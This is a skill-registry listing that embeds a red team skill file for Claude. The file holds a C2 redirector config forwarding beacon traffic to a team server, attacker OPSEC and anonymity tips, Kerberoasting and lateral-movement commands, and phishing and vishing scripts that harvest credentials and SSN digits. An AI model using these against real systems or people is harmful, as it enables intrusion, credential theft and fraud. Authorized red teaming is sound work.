/api/skills/masriyan-red-team-operations-engagement-planning/install?format=text
Find alternatives
/api/skills/search?q=Red%20Team%20Operations%20%26%20Engagement%20Planning&limit=3
Agent prompt
Use Red Team Operations & Engagement Planning for this task. Review https://www.openagentskill.com/api/skills/masriyan-red-team-operations-engagement-planning/install, then install with: npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement PlanningRegistry metadata
This page exposes the same decision, trust, audit, use-case, and install signals through the Registry API, so agents can rank this skill without scraping the UI.
Manifest
/api/registry/manifest/masriyan-red-team-operations-engagement-planning
LLM text
/api/registry/manifest/masriyan-red-team-operations-engagement-planning?format=text
Install alias
/api/registry/install/masriyan-red-team-operations-engagement-planning
Recommend
/api/registry/recommend?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20in%20an%20agent%20workflow&limit=3
Agent fit
Research agents
Use-case tags
Platforms
Claude Code, Browser agents
Audit report
A machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
Agent decision cockpit
Shortlist this skill and compare it with close alternatives before production adoption.
Role in stack
Companion skill
Primary fit
Research agents
Trust label
Strong shortlist
Install path
Command ready
Use when
Evidence
review first
Implementation path
Trust profile
Trust Score v5 found insufficient evidence for agent installation. Treat this as discovery material, not an executable recommendation.
GitHub adoption
INFO397 GitHub stars
Stars/forks activity
INFO397 stars, 75 forks; issue activity unavailable in current metadata
Recent maintenance
PASS2d since push
License clarity
PASSMIT
Good signals
Review before install
Recommended action
Choose a stronger alternative or inspect the source manually before any install attempt.
Quality profile
Solid option that is likely worth shortlisting for production workflows.
Workflow fit
Investigate faster
I need my agent to research a topic, compare sources, and produce a concise report.
Automate repeated work
I need my agent to automate a repeated workflow across tools and files.
Verify behavior
I need my agent to test a web app, reproduce bugs, and verify fixes.
Workflow fit
Design, build, test, and ship interfaces
A practical workflow for agents that turn product briefs or Figma designs into polished frontend code, review the result, test it in a browser, and prepare a safe deployment.
Find, compare, and synthesize
A workflow for agents that gather sources, compare claims, summarize long material, and draft useful research briefs.
Turn skills into distribution
A workflow for turning newly indexed skills into SEO briefs, social drafts, comparison pages, and reusable publishing workflows.
Alternative shortlist
Similar skills that may fit this task.
Guidance for distinctive, intentional UI design, typography, visual direction, and non-template-like product interfaces.
Design and implementation guidance for distinctive landing pages, portfolios, product demos, and purposeful redesigns.
Create original visual art, posters, PNG assets, and PDF documents through a clear design philosophy.
Apply Anthropic official brand colors, typography, and visual standards to appropriate Anthropic-related artifacts.
--- name: Red Team Operations & Engagement Planning description: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting version: 3.0.0 author: Masriyan tags: [cybersecurity, red-team, c2, lateral-movement, persistence, pentest, engagement, opsec] ---
# Red Team Operations & Engagement Planning
## Purpose
Enable Claude to assist authorized red team operators with engagement planning, C2 infrastructure design, attack methodology guidance, lateral movement strategy, OPSEC planning, and comprehensive reporting. Every workflow requires confirmed written authorization.
> **CRITICAL — AUTHORIZATION GATE**: Red team assistance requires explicit authorization confirmation before proceeding. Claude will ask for authorization context and will not assist with active attack planning without it. > > **Authorized contexts:** > - Signed Statement of Work (SOW) or Rules of Engagement (ROE) > - Bug bounty program (confirm target is in-scope) > - Internal security testing (confirm organizational authority) > - CTF competition (confirm challenge platform and scope) > - Research in owned/isolated lab environment
---
## Activation Triggers
This skill activates when the user asks about: - Planning a red team engagement or adversary simulation - Designing C2 infrastructure (redirectors, team servers, C2 profiles) - Active Directory attack paths (BloodHound, Kerberoasting, DCSync) - Lateral movement techniques for authorized engagements - Persistence mechanisms in red team context - Social engineering campaign planning (authorized) - Red team reporting and executive presentations - Tabletop exercises (TTX) design - Purple team collaboration - OPSEC planning for authorized operations
---
## Prerequisites
```bash pip install pyyaml requests ```
**Tools for authorized operations:** - `Cobalt Strike / Sliver / Havoc` — C2 frameworks - `Metasploit` — Exploitation framework - `BloodHound / SharpHound` — AD attack path analysis - `Impacket` — Network protocol tools - `CrackMapExec / NetExec` — AD enumeration - `Responder` — LLMNR/NBT-NS poisoning - `Mimikatz` — Credential access (Windows)
---
## Authorization Verification
**Before any operational planning, Claude asks:**
``` Red team assistance requires authorization confirmation:
1. What is the engagement type? □ External penetration test □ Internal network assessment □ Red team / adversary simulation □ Social engineering assessment □ Physical security assessment □ CTF competition
2. What is your authorization basis? □ Signed SOW / contract with target organization □ Internal role (IT/Security team testing own systems) □ Bug bounty — [program name] □ CTF — [platform and challenge name]
3. What is the defined scope? (IP ranges, domains, systems, excluded assets)
4. Who is the target organization's security point of contact? (For deconfliction — required for IR-level engagements)
Confirm before proceeding. Operational assistance without confirmed authorization cannot be provided. ```
---
## Core Capabilities
### 1. Engagement Planning
**When the user asks to plan a red team engagement:**
**Engagement Planning Framework:**
```markdown # Red Team Engagement Plan **Client:** [Organization Name] **Engagement Type:** [Full Red Team / CRTO / APT Simulation] **Start Date:** [Date] **End Date:** [Date] **Rules of Engagement Version:** 1.0
## Objectives - Primary: [e.g., Test detection and response capabilities against APT29 TTPs] - Secondary: [e.g., Identify privilege escalation paths to Domain Admin] - Out of Scope: [e.g., Production databases, payment systems, physical access]
## Threat Profile **Simulating:** [APT29 / FIN7 / LockBit / Custom adversary profile] **Initial Access Vector:** [Spearphishing / Supply chain / Watering hole] **Primary Goal:** [Data exfiltration / Ransomware simulation / Domain takeover]
## Attack Kill Chain Phases 1. Reconnaissance → OSINT, subdomain enum (Skill 01) 2. Initial Access → Phishing / external vuln exploitation 3. Execution → PowerShell / LOLBins / custom implant 4. Persistence → Registry / service / scheduled task 5. Privilege Escalation → Local privesc → Domain Admin 6. Defense Evasion → Process injection / AMSI bypass 7. Credential Access → LSASS / Kerberoasting / DCSync 8. Lateral Movement → PSExec / WMI / RDP 9. Collection → Identify critical data 10. Exfiltration → Staged transfer to simulated C2
## Rules of Engagement - Testing hours: [24x7 / Business hours only / Agreed windows] - Destructive testing: [Prohibited / Limited / Authorized] - DoS testing: [Prohibited] - Social engineering: [Authorized / Prohibited / Phishing only] - Physical access: [Prohibited / Badge cloning only] - Deconfliction: Call [POC Name] at [Phone] if critical systems impacted
## Emergency Abort Procedure If critical systems are impacted unexpectedly: 1. Immediately cease all operations 2. Call [POC] at [Phone] — available 24/7 3. Document what was done and when 4. Stand down until authorized to resume ```
**Engagement Planning Script:** ```bash python scripts/engagement_planner.py --scope scope.json --output plan.md ```
### 2. C2 Infrastructure Design
**When the user asks about C2 infrastructure for authorized operations:**
**Multi-Tier C2 Architecture:**
``` [Team Server] ← (internal/VPN only) → [Redirector 1 (HTTPS)] ← → [Beacon] → [Redirector 2 (DNS)] ← → [Beacon] → [Backup Redirector] ```
**Infrastructure Components:**
1. **Team Server** — Never directly exposed to internet; VPN access only 2. **Redirectors** — Cloud VPS instances (AWS/Azure/GCP) that proxy C2 traffic 3. **C2 Channels** — HTTPS (primary), DNS (backup), WebSocket (evasive) 4. **Domain Selection** — Aged domains, categorized (business/tech), valid cert
**Redirector Setup (Apache mod_rewrite):** ```apache # Redirect only Cobalt Strike beacon traffic to team server # Everything else → sends to legitimate domain (blend in) RewriteEngine On RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 \(Windows NT 6.1; WOW64\) AppleWebKit.*" RewriteCond %{REQUEST_URI} "^/jquery-3\.3\.1\.min\.js$" RewriteRule ^(.*)$ http://TEAMSERVER_IP/$1 [P,L] RewriteRule ^(.*)$ https://microsoft.com/ [R=302,L] # Decoy redirect ```
**Malleable C2 Profile Considerations:** - Mimic legitimate application traffic (CDN requests, Office updates, etc.) - Match real User-Agent strings from target environment - Use appropriate HTTP headers (Host, Accept-Language, etc.) - Set sleep/jitter to blend with normal traffic intervals
**OPSEC Checklist:** ``` Infrastructure OPSEC: [ ] Team server not directly accessible from internet [ ] All redirectors provisioned from different providers than each other [ ] Domain registered with privacy protection [ ] Domain aged ≥30 days before operation [ ] TLS certificate from legitimate CA (not self-signed) [ ] Kill dates set on all implants [ ] Logging enabled on team server for post-engagement review
Operational OPSEC: [ ] VPN/Tor for infrastructure access (not home IP) [ ] Separate browser profile for research vs. operation [ ] No real name/email in domain registration [ ] Payment via anonymous method where legally permitted [ ] Implant config: sandbox detection, sleep with jitter [ ] All C2 traffic encrypted and indistinguishable from HTTPS ```
### 3. Active Directory Attack Methodology
**When the user asks about AD attack paths for authorized engagements:**
**BloodHound Analysis Workflow:** ```bash # Collection (run on domain-joined host in scope) # PowerShell-based (noisier but complete) Import-Module SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp\
# C# executable (quieter) SharpHound.exe -c All --outputdirectory C:\temp\
# Upload ZIP to BloodHound UI and analyze: # Queries to run: # - Find Shortest Paths to Domain Admins # - Find Principals with DCSync Rights # - Find Computers with Unsupported Operating Systems # - Find AS-REP Roastable Users ```
**Key AD Attack Techniques (authorized):**
| Technique | ATT&CK ID | Tool | Description | |-----------|-----------|------|-------------| | Kerberoasting | T1558.003 | Rubeus, Impacket | Request TGS for SPNs → crack offline | | AS-REP Roasting | T1558.004 | Rubeus, GetNPUsers.py | Users with no pre-auth required | | Pass-the-Hash | T1550.002 | Impacket, CrackMapExec | Use NTLM hash without cracking | | Pass-the-Ticket | T1550.003 | Rubeus | Use Kerberos ticket for auth | | Overpass-the-Hash | T1550.003 | Rubeus | Convert NTLM hash to TGT | | DCSync | T1003.006 | Mimikatz, Impacket | Replicate domain hashes | | Golden Ticket | T1558.001 | Mimikatz | Forge TGT with KRBTGT hash | | Silver Ticket | T1558.002 | Mimikatz | Forge TGS for specific service |
**Kerberoasting (authorized use):** ```bash # Using Impacket (Linux → Windows domain) GetUserSPNs.py -dc-ip 192.168.1.10 domain.local/user:password -request
# Using Rubeus (on Windows, in scope) Rubeus.exe kerberoast /outfile:hashes.txt
# Crack with hashcat hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt ```
**Lateral Movement Options:** ```bash # PsExec style (via Impacket) psexec.py domain.local/admin:password@192.168.1.20
# WMI execution wmiexec.py domain.local/admin:password@192.168.1.20
# SMB with NetExec nxc smb 192.168.1.0/24 -u admin -p 'password' --shares
# RDP (if authorized) rdesktop -u admin -p password 192.168.1.20 ```
### 4. Social Engineering (Authorized Campaigns)
**When the user asks to plan an authorized social engineering exercise:**
**Phishing Campaign Framework:**
1. **Scope confirmation** — What targets are authorized? What is prohibited? 2. **Pretext development** — What scenario is believable for this organization? - IT help desk password reset - Finance: invoice / payment confirmation - HR: benefits enrollment - Executive: board communication 3. **Infrastructure setup** — Phishing domain, email server, landing page 4. **Landing page** — Credential harvester or payload delivery 5. **Tracking** — Click tracking, credential capture, payload execution 6. **Reporting metrics** — Click rate, credential submission rate, report rate
**Pretext Template (for authorized campaigns):** ``` Subject: Action Required: IT Security Policy Update — Password Reset Required
From: IT Help Desk <helpdesk@[spoofed-or-lookalike-domain]>
Dear [Name],
As part of our ongoing security improvements, all employees must update their passwords by [date]. Please click the link below to verify your identity and reset your password:
[Phishing Link]
If you did not receive this email or have questions, contact the IT Help Desk at x4444.
Regards, IT Security Team [Company Name]
--- [Include realistic footer with physical address, unsubscribe link for legitimacy] ```
**Vishing Script Template:** ``` Caller: "Hi, this is [Name] from IT Security. We've detected some unusual activity on your account. I need to verify your identity. Can I get your employee ID and the last four digits of your SSN?..." ```
### 5. Red Team Reporting
**When the user asks to create a red team report:**
```markdown # Red Team Assessment Report **CLIENT CONFIDENTIAL**
**Organization:** [Client Name] **Assessment Type:** [Red Team / APT Simulation] **Assessment Period:** [Date] to [Date] **Report Date:** [Date] **Report Classification:** Client Confidential
---
## Executive Summary [2-3 paragraphs: what was tested, what was found at high level, key recommendations. Written for non-technical executives.]
**Overall Risk Rating:** [Critical / High / Medium / Low]
**Key Findings:** 1. Initial access achieved via [vector] within [timeframe] 2. Domain Admin achieved via [technique] after [timeframe] 3. Detection gap: [N] hours from initial access to detection 4. [N] objectives achieved out of [N] defined
---
## Attack Timeline | Phase | Time | Action | Detection? | |-------|------|--------|-----------| |
Source provenance
Decision snapshot
recent repository activity
Audit
Install and adoption review
Agent-proven evidence
Outcome reports after resolve, review, install, and one narrow run.
No agent outcome data yet. The first agent run can report success, setup needs, risk blocks, failure, or not-relevant through /api/agent/outcome.
Install
Free and open source. Review the report before installing into production agents.
Growth loop
Scenario-led draft for Red Team Operations & Engagement Planning, ready for a manual X post.
Red Team Operations & Engagement Planning: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral... 397 stars https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=x
Listing + install path for Red Team Operations & Engagement Planning: https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=x Install: npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operatio...
Listing source
This listing was indexed from public sources and is not marked official until a maintainer claim is approved.
Attribution links to the public repository or creator profile. Creators can claim the listing to update ownership signals.
Claim this skillOwner claim
This Registry indexed listing is attributed to Masriyan but is not marked official yet. Claim it to add a verified owner signal and make future launch, install, and audit updates easier to trust.
Creator backlink kit
Show the canonical listing, current trust and audit signals, and real Agent-Proven evidence where developers evaluate the repository.
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning/audit)
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)Masriyan
@masriyan
Share whether this skill looks useful for your agent workflow. Aggregated feedback improves rankings over time.
Do not auto-install
Frontend Design
Guidance for distinctive, intentional UI design, typography, visual direction, and non-template-like product interfaces.
174.2K StarsTaste Skill: Anti-Slop Frontend
Design and implementation guidance for distinctive landing pages, portfolios, product demos, and purposeful redesigns.
84.4K StarsCanvas Design
Create original visual art, posters, PNG assets, and PDF documents through a clear design philosophy.
174.2K StarsAnthropic Brand Guidelines
Apply Anthropic official brand colors, typography, and visual standards to appropriate Anthropic-related artifacts.
174.2K Starsstandard package or runtime install path
Permission surface
secrets or environment access, shell or command execution
Agent outcomes
No agent outcome data yet
Docs
Strong README/SKILL.md context
Risk summary
Install readiness
standard package or runtime install path
Permission surface
secrets or environment access, shell or command execution
Agent outcomes
No agent outcome data yet
Docs
Strong README/SKILL.md context
Risk summary
Install readiness
standard package or runtime install path
Permission surface
secrets or environment access, shell or command execution
Agent outcomes
No agent outcome data yet
Docs
Strong README/SKILL.md context
Risk summary
Install readiness
standard package or runtime install path
Permission surface
secrets or environment access, shell or command execution
Agent outcomes
No agent outcome data yet
Docs
Strong README/SKILL.md context
Risk summary
Install readiness